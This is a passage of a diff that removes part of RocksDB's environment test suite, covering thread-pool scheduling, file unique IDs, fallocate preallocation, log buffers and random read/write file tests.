-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(tasks[5].IsSleeping());
-  ASSERT_TRUE(tasks[6].IsSleeping());
-  ASSERT_TRUE(tasks[7].IsSleeping());
-
-  // Wake up task  6. Task 5, 7 running
-  tasks[6].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(tasks[5].IsSleeping());
-  ASSERT_TRUE(!tasks[6].IsSleeping());
-  ASSERT_TRUE(tasks[7].IsSleeping());
-
-  // Wake up threads 7. Task 5 running
-  tasks[7].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(!tasks[7].IsSleeping());
-
-  // Enqueue thread 8 and 9. Task 5 running; one of 8, 9 might be running.
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &tasks[8],
-                 Env::Priority::HIGH);
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &tasks[9],
-                 Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_GT(env_->GetThreadPoolQueueLen(Env::Priority::HIGH), (unsigned int)0);
-  ASSERT_TRUE(!tasks[8].IsSleeping() || !tasks[9].IsSleeping());
-
-  // Increase to 4 threads. Task 5, 8, 9 running.
-  env_->SetBackgroundThreads(4, Env::Priority::HIGH);
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_EQ((unsigned int)0, env_->GetThreadPoolQueueLen(Env::Priority::HIGH));
-  ASSERT_TRUE(tasks[8].IsSleeping());
-  ASSERT_TRUE(tasks[9].IsSleeping());
-
-  // Shrink to 1 thread
-  env_->SetBackgroundThreads(1, Env::Priority::HIGH);
-
-  // Wake up thread 9.
-  tasks[9].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(!tasks[9].IsSleeping());
-  ASSERT_TRUE(tasks[8].IsSleeping());
-
-  // Wake up thread 8
-  tasks[8].WakeUp();
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(!tasks[8].IsSleeping());
-
-  // Wake up the last thread
-  tasks[5].WakeUp();
-
-  Env::Default()->SleepForMicroseconds(kDelayMicros);
-  ASSERT_TRUE(!tasks[5].IsSleeping());
-  WaitThreadPoolsEmpty();
-}
-
-#if (defined OS_LINUX || defined OS_WIN)
-// Travis doesn't support fallocate or getting unique ID from files for whatever
-// reason.
-#ifndef TRAVIS
-
-namespace {
-bool IsSingleVarint(const std::string& s) {
-  Slice slice(s);
-
-  uint64_t v;
-  if (!GetVarint64(&slice, &v)) {
-    return false;
-  }
-
-  return slice.size() == 0;
-}
-
-bool IsUniqueIDValid(const std::string& s) {
-  return !s.empty() && !IsSingleVarint(s);
-}
-
-const size_t MAX_ID_SIZE = 100;
-char temp_id[MAX_ID_SIZE];
-
-
-}  // namespace
-
-// Determine whether we can use the FS_IOC_GETVERSION ioctl
-// on a file in directory DIR.  Create a temporary file therein,
-// try to apply the ioctl (save that result), cleanup and
-// return the result.  Return true if it is supported, and
-// false if anything fails.
-// Note that this function "knows" that dir has just been created
-// and is empty, so we create a simply-named test file: "f".
-bool ioctl_support__FS_IOC_GETVERSION(const std::string& dir) {
-#ifdef OS_WIN
-  return true;
-#else
-  const std::string file = dir + "/f";
-  int fd;
-  do {
-    fd = open(file.c_str(), O_CREAT | O_RDWR | O_TRUNC, 0644);
-  } while (fd < 0 && errno == EINTR);
-  long int version;
-  bool ok = (fd >= 0 && ioctl(fd, FS_IOC_GETVERSION, &version) >= 0);
-
-  close(fd);
-  unlink(file.c_str());
-
-  return ok;
-#endif
-}
-
-// To ensure that Env::GetUniqueId-related tests work correctly, the files
-// should be stored in regular storage like "hard disk" or "flash device",
-// and not on a tmpfs file system (like /dev/shm and /tmp on some systems).
-// Otherwise we cannot get the correct id.
-//
-// This function serves as the replacement for test::TmpDir(), which may be
-// customized to be on a file system that doesn't work with GetUniqueId().
-
-class IoctlFriendlyTmpdir {
- public:
-  explicit IoctlFriendlyTmpdir() {
-    char dir_buf[100];
-
-    const char *fmt = "%s/rocksdb.XXXXXX";
-    const char *tmp = getenv("TEST_IOCTL_FRIENDLY_TMPDIR");
-
-#ifdef OS_WIN
-#define rmdir _rmdir
-    if(tmp == nullptr) {
-      tmp = getenv("TMP");
-    }
-
-    snprintf(dir_buf, sizeof dir_buf, fmt, tmp);
-    auto result = _mktemp(dir_buf);
-    assert(result != nullptr);
-    BOOL ret = CreateDirectory(dir_buf, NULL);
-    assert(ret == TRUE);
-    dir_ = dir_buf;
-#else
-    std::list<std::string> candidate_dir_list = {"/var/tmp", "/tmp"};
-
-    // If $TEST_IOCTL_FRIENDLY_TMPDIR/rocksdb.XXXXXX fits, use
-    // $TEST_IOCTL_FRIENDLY_TMPDIR; subtract 2 for the "%s", and
-    // add 1 for the trailing NUL byte.
-    if (tmp && strlen(tmp) + strlen(fmt) - 2 + 1 <= sizeof dir_buf) {
-      // use $TEST_IOCTL_FRIENDLY_TMPDIR value
-      candidate_dir_list.push_front(tmp);
-    }
-
-    for (const std::string& d : candidate_dir_list) {
-      snprintf(dir_buf, sizeof dir_buf, fmt, d.c_str());
-      if (mkdtemp(dir_buf)) {
-        if (ioctl_support__FS_IOC_GETVERSION(dir_buf)) {
-          dir_ = dir_buf;
-          return;
-        } else {
-          // Diagnose ioctl-related failure only if this is the
-          // directory specified via that envvar.
-          if (tmp && tmp == d) {
-            fprintf(stderr, "TEST_IOCTL_FRIENDLY_TMPDIR-specified directory is "
-                    "not suitable: %s\n", d.c_str());
-          }
-          rmdir(dir_buf);  // ignore failure
-        }
-      } else {
-        // mkdtemp failed: diagnose it, but don't give up.
-        fprintf(stderr, "mkdtemp(%s/...) failed: %s\n", d.c_str(),
-                strerror(errno));
-      }
-    }
-
-    fprintf(stderr, "failed to find an ioctl-friendly temporary directory;"
-            " specify one via the TEST_IOCTL_FRIENDLY_TMPDIR envvar\n");
-    std::abort();
-#endif
-}
-
-  ~IoctlFriendlyTmpdir() {
-    rmdir(dir_.c_str());
-  }
-
-  const std::string& name() const {
-    return dir_;
-  }
-
- private:
-  std::string dir_;
-};
-
-#ifndef ROCKSDB_LITE
-TEST_F(EnvPosixTest, PositionedAppend) {
-  unique_ptr<WritableFile> writable_file;
-  EnvOptions options;
-  options.use_direct_writes = true;
-  options.use_mmap_writes = false;
-  IoctlFriendlyTmpdir ift;
-  ASSERT_OK(env_->NewWritableFile(ift.name() + "/f", &writable_file, options));
-  const size_t kBlockSize = 4096;
-  const size_t kPageSize = 4096;
-  const size_t kDataSize = kPageSize;
-  // Write a page worth of 'a'
-  auto data_ptr = NewAligned(kDataSize, 'a');
-  Slice data_a(data_ptr.get(), kDataSize);
-  ASSERT_OK(writable_file->PositionedAppend(data_a, 0U));
-  // Write a page worth of 'b' right after the first sector
-  data_ptr = NewAligned(kDataSize, 'b');
-  Slice data_b(data_ptr.get(), kDataSize);
-  ASSERT_OK(writable_file->PositionedAppend(data_b, kBlockSize));
-  ASSERT_OK(writable_file->Close());
-  // The file now has 1 sector worth of a followed by a page worth of b
-
-  // Verify the above
-  unique_ptr<SequentialFile> seq_file;
-  ASSERT_OK(env_->NewSequentialFile(ift.name() + "/f", &seq_file, options));
-  char scratch[kPageSize * 2];
-  Slice result;
-  ASSERT_OK(seq_file->Read(sizeof(scratch), &result, scratch));
-  ASSERT_EQ(kPageSize + kBlockSize, result.size());
-  ASSERT_EQ('a', result[kBlockSize - 1]);
-  ASSERT_EQ('b', result[kBlockSize]);
-}
-#endif  // !ROCKSDB_LITE
-
-// Only works in linux platforms
-TEST_P(EnvPosixTestWithParam, RandomAccessUniqueID) {
-  // Create file.
-  if (env_ == Env::Default()) {
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-    IoctlFriendlyTmpdir ift;
-    std::string fname = ift.name() + "/testfile";
-    unique_ptr<WritableFile> wfile;
-    ASSERT_OK(env_->NewWritableFile(fname, &wfile, soptions));
-
-    unique_ptr<RandomAccessFile> file;
-
-    // Get Unique ID
-    ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-    size_t id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-    ASSERT_TRUE(id_size > 0);
-    std::string unique_id1(temp_id, id_size);
-    ASSERT_TRUE(IsUniqueIDValid(unique_id1));
-
-    // Get Unique ID again
-    ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-    id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-    ASSERT_TRUE(id_size > 0);
-    std::string unique_id2(temp_id, id_size);
-    ASSERT_TRUE(IsUniqueIDValid(unique_id2));
-
-    // Get Unique ID again after waiting some time.
-    env_->SleepForMicroseconds(1000000);
-    ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-    id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-    ASSERT_TRUE(id_size > 0);
-    std::string unique_id3(temp_id, id_size);
-    ASSERT_TRUE(IsUniqueIDValid(unique_id3));
-
-    // Check IDs are the same.
-    ASSERT_EQ(unique_id1, unique_id2);
-    ASSERT_EQ(unique_id2, unique_id3);
-
-    // Delete the file
-    env_->DeleteFile(fname);
-  }
-}
-
-// only works in linux platforms
-#ifdef ROCKSDB_FALLOCATE_PRESENT
-TEST_P(EnvPosixTestWithParam, AllocateTest) {
-  if (env_ == Env::Default()) {
-    IoctlFriendlyTmpdir ift;
-    std::string fname = ift.name() + "/preallocate_testfile";
-
-    // Try fallocate in a file to see whether the target file system supports
-    // it.
-    // Skip the test if fallocate is not supported.
-    std::string fname_test_fallocate = ift.name() + "/preallocate_testfile_2";
-    int fd = -1;
-    do {
-      fd = open(fname_test_fallocate.c_str(), O_CREAT | O_RDWR | O_TRUNC, 0644);
-    } while (fd < 0 && errno == EINTR);
-    ASSERT_GT(fd, 0);
-
-    int alloc_status = fallocate(fd, 0, 0, 1);
-
-    int err_number = 0;
-    if (alloc_status != 0) {
-      err_number = errno;
-      fprintf(stderr, "Warning: fallocate() fails, %s\n", strerror(err_number));
-    }
-    close(fd);
-    ASSERT_OK(env_->DeleteFile(fname_test_fallocate));
-    if (alloc_status != 0 && err_number == EOPNOTSUPP) {
-      // The filesystem containing the file does not support fallocate
-      return;
-    }
-
-    EnvOptions soptions;
-    soptions.use_mmap_writes = false;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-    unique_ptr<WritableFile> wfile;
-    ASSERT_OK(env_->NewWritableFile(fname, &wfile, soptions));
-
-    // allocate 100 MB
-    size_t kPreallocateSize = 100 * 1024 * 1024;
-    size_t kBlockSize = 512;
-    size_t kPageSize = 4096;
-    size_t kDataSize = 1024 * 1024;
-    auto data_ptr = NewAligned(kDataSize, 'A');
-    Slice data(data_ptr.get(), kDataSize);
-    wfile->SetPreallocationBlockSize(kPreallocateSize);
-    wfile->PrepareWrite(wfile->GetFileSize(), kDataSize);
-    ASSERT_OK(wfile->Append(data));
-    ASSERT_OK(wfile->Flush());
-
-    struct stat f_stat;
-    ASSERT_EQ(stat(fname.c_str(), &f_stat), 0);
-    ASSERT_EQ((unsigned int)kDataSize, f_stat.st_size);
-    // verify that blocks are preallocated
-    // Note here that we don't check the exact number of blocks preallocated --
-    // we only require that number of allocated blocks is at least what we
-    // expect.
-    // It looks like some FS give us more blocks that we asked for. That's fine.
-    // It might be worth investigating further.
-    ASSERT_LE((unsigned int)(kPreallocateSize / kBlockSize), f_stat.st_blocks);
-
-    // close the file, should deallocate the blocks
-    wfile.reset();
-
-    stat(fname.c_str(), &f_stat);
-    ASSERT_EQ((unsigned int)kDataSize, f_stat.st_size);
-    // verify that preallocated blocks were deallocated on file close
-    // Because the FS might give us more blocks, we add a full page to the size
-    // and expect the number of blocks to be less or equal to that.
-    ASSERT_GE((f_stat.st_size + kPageSize + kBlockSize - 1) / kBlockSize,
-              (unsigned int)f_stat.st_blocks);
-  }
-}
-#endif  // ROCKSDB_FALLOCATE_PRESENT
-
-// Returns true if any of the strings in ss are the prefix of another string.
-bool HasPrefix(const std::unordered_set<std::string>& ss) {
-  for (const std::string& s: ss) {
-    if (s.empty()) {
-      return true;
-    }
-    for (size_t i = 1; i < s.size(); ++i) {
-      if (ss.count(s.substr(0, i)) != 0) {
-        return true;
-      }
-    }
-  }
-  return false;
-}
-
-// Only works in linux and WIN platforms
-TEST_P(EnvPosixTestWithParam, RandomAccessUniqueIDConcurrent) {
-  if (env_ == Env::Default()) {
-    // Check whether a bunch of concurrently existing files have unique IDs.
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-
-    // Create the files
-    IoctlFriendlyTmpdir ift;
-    std::vector<std::string> fnames;
-    for (int i = 0; i < 1000; ++i) {
-      fnames.push_back(ift.name() + "/" + "testfile" + ToString(i));
-
-      // Create file.
-      unique_ptr<WritableFile> wfile;
-      ASSERT_OK(env_->NewWritableFile(fnames[i], &wfile, soptions));
-    }
-
-    // Collect and check whether the IDs are unique.
-    std::unordered_set<std::string> ids;
-    for (const std::string fname : fnames) {
-      unique_ptr<RandomAccessFile> file;
-      std::string unique_id;
-      ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-      size_t id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-      ASSERT_TRUE(id_size > 0);
-      unique_id = std::string(temp_id, id_size);
-      ASSERT_TRUE(IsUniqueIDValid(unique_id));
-
-      ASSERT_TRUE(ids.count(unique_id) == 0);
-      ids.insert(unique_id);
-    }
-
-    // Delete the files
-    for (const std::string fname : fnames) {
-      ASSERT_OK(env_->DeleteFile(fname));
-    }
-
-    ASSERT_TRUE(!HasPrefix(ids));
-  }
-}
-
-// Only works in linux and WIN platforms
-TEST_P(EnvPosixTestWithParam, RandomAccessUniqueIDDeletes) {
-  if (env_ == Env::Default()) {
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-
-    IoctlFriendlyTmpdir ift;
-    std::string fname = ift.name() + "/" + "testfile";
-
-    // Check that after file is deleted we don't get same ID again in a new
-    // file.
-    std::unordered_set<std::string> ids;
-    for (int i = 0; i < 1000; ++i) {
-      // Create file.
-      {
-        unique_ptr<WritableFile> wfile;
-        ASSERT_OK(env_->NewWritableFile(fname, &wfile, soptions));
-      }
-
-      // Get Unique ID
-      std::string unique_id;
-      {
-        unique_ptr<RandomAccessFile> file;
-        ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-        size_t id_size = file->GetUniqueId(temp_id, MAX_ID_SIZE);
-        ASSERT_TRUE(id_size > 0);
-        unique_id = std::string(temp_id, id_size);
-      }
-
-      ASSERT_TRUE(IsUniqueIDValid(unique_id));
-      ASSERT_TRUE(ids.count(unique_id) == 0);
-      ids.insert(unique_id);
-
-      // Delete the file
-      ASSERT_OK(env_->DeleteFile(fname));
-    }
-
-    ASSERT_TRUE(!HasPrefix(ids));
-  }
-}
-
-// Only works in linux platforms
-#ifdef OS_WIN
-TEST_P(EnvPosixTestWithParam, DISABLED_InvalidateCache) {
-#else
-TEST_P(EnvPosixTestWithParam, InvalidateCache) {
-#endif
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-    std::string fname = test::TmpDir(env_) + "/" + "testfile";
-
-    const size_t kSectorSize = 512;
-    auto data = NewAligned(kSectorSize, 0);
-    Slice slice(data.get(), kSectorSize);
-
-    // Create file.
-    {
-      unique_ptr<WritableFile> wfile;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-      if (soptions.use_direct_writes) {
-        soptions.use_direct_writes = false;
-      }
-#endif
-      ASSERT_OK(env_->NewWritableFile(fname, &wfile, soptions));
-      ASSERT_OK(wfile->Append(slice));
-      ASSERT_OK(wfile->InvalidateCache(0, 0));
-      ASSERT_OK(wfile->Close());
-    }
-
-    // Random Read
-    {
-      unique_ptr<RandomAccessFile> file;
-      auto scratch = NewAligned(kSectorSize, 0);
-      Slice result;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-      if (soptions.use_direct_reads) {
-        soptions.use_direct_reads = false;
-      }
-#endif
-      ASSERT_OK(env_->NewRandomAccessFile(fname, &file, soptions));
-      ASSERT_OK(file->Read(0, kSectorSize, &result, scratch.get()));
-      ASSERT_EQ(memcmp(scratch.get(), data.get(), kSectorSize), 0);
-      ASSERT_OK(file->InvalidateCache(0, 11));
-      ASSERT_OK(file->InvalidateCache(0, 0));
-    }
-
-    // Sequential Read
-    {
-      unique_ptr<SequentialFile> file;
-      auto scratch = NewAligned(kSectorSize, 0);
-      Slice result;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-      if (soptions.use_direct_reads) {
-        soptions.use_direct_reads = false;
-      }
-#endif
-      ASSERT_OK(env_->NewSequentialFile(fname, &file, soptions));
-      if (file->use_direct_io()) {
-        ASSERT_OK(file->PositionedRead(0, kSectorSize, &result, scratch.get()));
-      } else {
-        ASSERT_OK(file->Read(kSectorSize, &result, scratch.get()));
-      }
-      ASSERT_EQ(memcmp(scratch.get(), data.get(), kSectorSize), 0);
-      ASSERT_OK(file->InvalidateCache(0, 11));
-      ASSERT_OK(file->InvalidateCache(0, 0));
-    }
-    // Delete the file
-    ASSERT_OK(env_->DeleteFile(fname));
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-}
-#endif  // not TRAVIS
-#endif  // OS_LINUX || OS_WIN
-
-class TestLogger : public Logger {
- public:
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    log_count++;
-
-    char new_format[550];
-    std::fill_n(new_format, sizeof(new_format), '2');
-    {
-      va_list backup_ap;
-      va_copy(backup_ap, ap);
-      int n = vsnprintf(new_format, sizeof(new_format) - 1, format, backup_ap);
-      // 48 bytes for extra information + bytes allocated
-
-// When we have n == -1 there is not a terminating zero expected
-#ifdef OS_WIN
-      if (n < 0) {
-        char_0_count++;
-      }
-#endif
-
-      if (new_format[0] == '[') {
-        // "[DEBUG] "
-        ASSERT_TRUE(n <= 56 + (512 - static_cast<int>(sizeof(struct timeval))));
-      } else {
-        ASSERT_TRUE(n <= 48 + (512 - static_cast<int>(sizeof(struct timeval))));
-      }
-      va_end(backup_ap);
-    }
-
-    for (size_t i = 0; i < sizeof(new_format); i++) {
-      if (new_format[i] == 'x') {
-        char_x_count++;
-      } else if (new_format[i] == '\0') {
-        char_0_count++;
-      }
-    }
-  }
-  int log_count;
-  int char_x_count;
-  int char_0_count;
-};
-
-TEST_P(EnvPosixTestWithParam, LogBufferTest) {
-  TestLogger test_logger;
-  test_logger.SetInfoLogLevel(InfoLogLevel::INFO_LEVEL);
-  test_logger.log_count = 0;
-  test_logger.char_x_count = 0;
-  test_logger.char_0_count = 0;
-  LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL, &test_logger);
-  LogBuffer log_buffer_debug(DEBUG_LEVEL, &test_logger);
-
-  char bytes200[200];
-  std::fill_n(bytes200, sizeof(bytes200), '1');
-  bytes200[sizeof(bytes200) - 1] = '\0';
-  char bytes600[600];
-  std::fill_n(bytes600, sizeof(bytes600), '1');
-  bytes600[sizeof(bytes600) - 1] = '\0';
-  char bytes9000[9000];
-  std::fill_n(bytes9000, sizeof(bytes9000), '1');
-  bytes9000[sizeof(bytes9000) - 1] = '\0';
-
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx", bytes200);
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx", bytes600);
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx%sx%sx", bytes200, bytes200, bytes200);
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx%sx", bytes200, bytes600);
-  ROCKS_LOG_BUFFER(&log_buffer, "x%sx%sx", bytes600, bytes9000);
-
-  ROCKS_LOG_BUFFER(&log_buffer_debug, "x%sx", bytes200);
-  test_logger.SetInfoLogLevel(DEBUG_LEVEL);
-  ROCKS_LOG_BUFFER(&log_buffer_debug, "x%sx%sx%sx", bytes600, bytes9000,
-                   bytes200);
-
-  ASSERT_EQ(0, test_logger.log_count);
-  log_buffer.FlushBufferToLog();
-  log_buffer_debug.FlushBufferToLog();
-  ASSERT_EQ(6, test_logger.log_count);
-  ASSERT_EQ(6, test_logger.char_0_count);
-  ASSERT_EQ(10, test_logger.char_x_count);
-}
-
-class TestLogger2 : public Logger {
- public:
-  explicit TestLogger2(size_t max_log_size) : max_log_size_(max_log_size) {}
-  using Logger::Logv;
-  virtual void Logv(const char* format, va_list ap) override {
-    char new_format[2000];
-    std::fill_n(new_format, sizeof(new_format), '2');
-    {
-      va_list backup_ap;
-      va_copy(backup_ap, ap);
-      int n = vsnprintf(new_format, sizeof(new_format) - 1, format, backup_ap);
-      // 48 bytes for extra information + bytes allocated
-      ASSERT_TRUE(
-          n <= 48 + static_cast<int>(max_log_size_ - sizeof(struct timeval)));
-      ASSERT_TRUE(n > static_cast<int>(max_log_size_ - sizeof(struct timeval)));
-      va_end(backup_ap);
-    }
-  }
-  size_t max_log_size_;
-};
-
-TEST_P(EnvPosixTestWithParam, LogBufferMaxSizeTest) {
-  char bytes9000[9000];
-  std::fill_n(bytes9000, sizeof(bytes9000), '1');
-  bytes9000[sizeof(bytes9000) - 1] = '\0';
-
-  for (size_t max_log_size = 256; max_log_size <= 1024;
-       max_log_size += 1024 - 256) {
-    TestLogger2 test_logger(max_log_size);
-    test_logger.SetInfoLogLevel(InfoLogLevel::INFO_LEVEL);
-    LogBuffer log_buffer(InfoLogLevel::INFO_LEVEL, &test_logger);
-    ROCKS_LOG_BUFFER_MAX_SZ(&log_buffer, max_log_size, "%s", bytes9000);
-    log_buffer.FlushBufferToLog();
-  }
-}
-
-TEST_P(EnvPosixTestWithParam, Preallocation) {
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    const std::string src = test::TmpDir(env_) + "/" + "testfile";
-    unique_ptr<WritableFile> srcfile;
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-    if (soptions.use_direct_writes) {
-      rocksdb::SyncPoint::GetInstance()->SetCallBack(
-          "NewWritableFile:O_DIRECT", [&](void* arg) {
-            int* val = static_cast<int*>(arg);
-            *val &= ~O_DIRECT;
-          });
-    }
-#endif
-    ASSERT_OK(env_->NewWritableFile(src, &srcfile, soptions));
-    srcfile->SetPreallocationBlockSize(1024 * 1024);
-
-    // No writes should mean no preallocation
-    size_t block_size, last_allocated_block;
-    srcfile->GetPreallocationStatus(&block_size, &last_allocated_block);
-    ASSERT_EQ(last_allocated_block, 0UL);
-
-    // Small write should preallocate one block
-    size_t kStrSize = 4096;
-    auto data = NewAligned(kStrSize, 'A');
-    Slice str(data.get(), kStrSize);
-    srcfile->PrepareWrite(srcfile->GetFileSize(), kStrSize);
-    srcfile->Append(str);
-    srcfile->GetPreallocationStatus(&block_size, &last_allocated_block);
-    ASSERT_EQ(last_allocated_block, 1UL);
-
-    // Write an entire preallocation block, make sure we increased by two.
-    {
-      auto buf_ptr = NewAligned(block_size, ' ');
-      Slice buf(buf_ptr.get(), block_size);
-      srcfile->PrepareWrite(srcfile->GetFileSize(), block_size);
-      srcfile->Append(buf);
-      srcfile->GetPreallocationStatus(&block_size, &last_allocated_block);
-      ASSERT_EQ(last_allocated_block, 2UL);
-    }
-
-    // Write five more blocks at once, ensure we're where we need to be.
-    {
-      auto buf_ptr = NewAligned(block_size * 5, ' ');
-      Slice buf = Slice(buf_ptr.get(), block_size * 5);
-      srcfile->PrepareWrite(srcfile->GetFileSize(), buf.size());
-      srcfile->Append(buf);
-      srcfile->GetPreallocationStatus(&block_size, &last_allocated_block);
-      ASSERT_EQ(last_allocated_block, 7UL);
-    }
-  rocksdb::SyncPoint::GetInstance()->ClearTrace();
-}
-
-// Test that the two ways to get children file attributes (in bulk or
-// individually) behave consistently.
-TEST_P(EnvPosixTestWithParam, ConsistentChildrenAttributes) {
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-    EnvOptions soptions;
-    soptions.use_direct_reads = soptions.use_direct_writes = direct_io_;
-    const int kNumChildren = 10;
-
-    std::string data;
-    for (int i = 0; i < kNumChildren; ++i) {
-      std::ostringstream oss;
-      oss << test::TmpDir(env_) << "/testfile_" << i;
-      const std::string path = oss.str();
-      unique_ptr<WritableFile> file;
-#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && !defined(OS_AIX)
-      if (soptions.use_direct_writes) {
-        rocksdb::SyncPoint::GetInstance()->SetCallBack(
-            "NewWritableFile:O_DIRECT", [&](void* arg) {
-              int* val = static_cast<int*>(arg);
-              *val &= ~O_DIRECT;
-            });
-      }
-#endif
-      ASSERT_OK(env_->NewWritableFile(path, &file, soptions));
-      auto buf_ptr = NewAligned(data.size(), 'T');
-      Slice buf(buf_ptr.get(), data.size());
-      file->Append(buf);
-      data.append(std::string(4096, 'T'));
-    }
-
-    std::vector<Env::FileAttributes> file_attrs;
-    ASSERT_OK(env_->GetChildrenFileAttributes(test::TmpDir(env_), &file_attrs));
-    for (int i = 0; i < kNumChildren; ++i) {
-      std::ostringstream oss;
-      oss << "testfile_" << i;
-      const std::string name = oss.str();
-      const std::string path = test::TmpDir(env_) + "/" + name;
-
-      auto file_attrs_iter = std::find_if(
-          file_attrs.begin(), file_attrs.end(),
-          [&name](const Env::FileAttributes& fm) { return fm.name == name; });
-      ASSERT_TRUE(file_attrs_iter != file_attrs.end());
-      uint64_t size;
-      ASSERT_OK(env_->GetFileSize(path, &size));
-      ASSERT_EQ(size, 4096 * i);
-      ASSERT_EQ(size, file_attrs_iter->size_bytes);
-    }
-    rocksdb::SyncPoint::GetInstance()->ClearTrace();
-}
-
-// Test that all WritableFileWrapper forwards all calls to WritableFile.
-TEST_P(EnvPosixTestWithParam, WritableFileWrapper) {
-  class Base : public WritableFile {
-   public:
-    mutable int *step_;
-
-    void inc(int x) const {
-      EXPECT_EQ(x, (*step_)++);
-    }
-
-    explicit Base(int* step) : step_(step) {
-      inc(0);
-    }
-
-    Status Append(const Slice& data) override { inc(1); return Status::OK(); }
-    Status Truncate(uint64_t size) override { return Status::OK(); }
-    Status Close() override { inc(2); return Status::OK(); }
-    Status Flush() override { inc(3); return Status::OK(); }
-    Status Sync() override { inc(4); return Status::OK(); }
-    Status Fsync() override { inc(5); return Status::OK(); }
-    void SetIOPriority(Env::IOPriority pri) override { inc(6); }
-    uint64_t GetFileSize() override { inc(7); return 0; }
-    void GetPreallocationStatus(size_t* block_size,
-                                size_t* last_allocated_block) override {
-      inc(8);
-    }
-    size_t GetUniqueId(char* id, size_t max_size) const override {
-      inc(9);
-      return 0;
-    }
-    Status InvalidateCache(size_t offset, size_t length) override {
-      inc(10);
-      return Status::OK();
-    }
-
-   protected:
-    Status Allocate(uint64_t offset, uint64_t len) override {
-      inc(11);
-      return Status::OK();
-    }
-    Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-      inc(12);
-      return Status::OK();
-    }
-
-   public:
-    ~Base() {
-      inc(13);
-    }
-  };
-
-  class Wrapper : public WritableFileWrapper {
-   public:
-    explicit Wrapper(WritableFile* target) : WritableFileWrapper(target) {}
-
-    void CallProtectedMethods() {
-      Allocate(0, 0);
-      RangeSync(0, 0);
-    }
-  };
-
-  int step = 0;
-
-  {
-    Base b(&step);
-    Wrapper w(&b);
-    w.Append(Slice());
-    w.Close();
-    w.Flush();
-    w.Sync();
-    w.Fsync();
-    w.SetIOPriority(Env::IOPriority::IO_HIGH);
-    w.GetFileSize();
-    w.GetPreallocationStatus(nullptr, nullptr);
-    w.GetUniqueId(nullptr, 0);
-    w.InvalidateCache(0, 0);
-    w.CallProtectedMethods();
-  }
-
-  EXPECT_EQ(14, step);
-}
-
-TEST_P(EnvPosixTestWithParam, PosixRandomRWFile) {
-  const std::string path = test::TmpDir(env_) + "/random_rw_file";
-
-  env_->DeleteFile(path);
-
-  std::unique_ptr<RandomRWFile> file;
-  ASSERT_OK(env_->NewRandomRWFile(path, &file, EnvOptions()));
-
-  char buf[10000];
-  Slice read_res;
-
-  ASSERT_OK(file->Write(0, "ABCD"));
-  ASSERT_OK(file->Read(0, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABCD");
-
-  ASSERT_OK(file->Write(2, "XXXX"));
-  ASSERT_OK(file->Read(0, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABXXXX");
-
-  ASSERT_OK(file->Write(10, "ZZZ"));
-  ASSERT_OK(file->Read(10, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ZZZ");
-
-  ASSERT_OK(file->Write(11, "Y"));
-  ASSERT_OK(file->Read(10, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ZYZ");
-
-  ASSERT_OK(file->Write(200, "FFFFF"));
-  ASSERT_OK(file->Read(200, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "FFFFF");
-
-  ASSERT_OK(file->Write(205, "XXXX"));
-  ASSERT_OK(file->Read(200, 10, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "FFFFFXXXX");
-
-  ASSERT_OK(file->Write(5, "QQQQ"));
-  ASSERT_OK(file->Read(0, 9, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "ABXXXQQQQ");
-
-  ASSERT_OK(file->Read(2, 4, &read_res, buf));
-  ASSERT_EQ(read_res.ToString(), "XXXQ");
-
